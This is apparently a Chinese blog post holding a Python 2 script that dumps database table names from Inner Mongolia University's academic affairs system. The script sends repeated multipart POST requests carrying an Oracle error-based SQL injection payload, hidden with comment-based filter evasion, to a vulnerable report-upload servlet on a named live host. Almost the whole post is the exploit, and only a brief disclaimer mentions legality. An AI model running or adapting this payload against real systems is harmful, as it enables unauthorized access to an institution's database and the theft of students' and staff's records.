内蒙古大学教务处脱表名脚本

本文介绍了一种使用Python脚本进行SQL注入攻击的方法。通过构造特定的HTTP请求,该脚本可以尝试从目标网站中获取数据库表名等敏感信息。需要注意的是,这种行为可能违反法律,请仅用于合法的安全测试。
# -*- coding: gbk -*-
import urllib2
for icounti in range(1000):
    myhehedata="tbl=dual/**/where/**/1=ctxsys.drithsx.sn(1,(SELECT/**/table_name FROM(SELECT/**/user_tables.table_name,ROWNUM/**/AS/**/CON/**/FROM/**/user_tables/**/WHERE ROWNUM/**/<= %s)WHERE/**/CON >=%s))/**/--;keyValue=2;keyCol=1;updateValue=1;updateCol=1" % (str(icounti),str(icounti))
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1","Host":"www.ikcw.com","Content-Type":"multipart/form-data","boundary":"---------------------------18427761219428419421453724393"}
    boundary='---------------------------18427761219428419421453724393'
    data=[]
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="file";filename=""')
    data.append('Content-Type: application/octet-stream\r\n')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="update"\r\n')
    data.append(myhehedata)
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="xh"\r\n')
    data.append('test')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="processor"\r\n')
    data.append('com.runqian.report.input.AbstractProcessor')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="backAndRefresh"\r\n')
    data.append('test')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="webTableName"\r\n')
    data.append('test1')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="importTo"\r\n')
    data.append('text')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="params"\r\n')
    data.append('params')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="submit"\r\n')
    data.append('Submit')
    data.append('--%s--' % boundary)
    httpBody='\r\n'.join(data)



    postDataUrl='http://jwxt.imu.edu.cn/servlet/com.runqian.report.input.UploadFile2DBServlet'
    req=urllib2.Request(postDataUrl,data=httpBody,headers=headers)
    resul= urllib2.urlopen(req)

    resulstr= resul.read().decode("gbk")

    arry= resulstr.split('\n')
    print arry[1][15:-3]

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值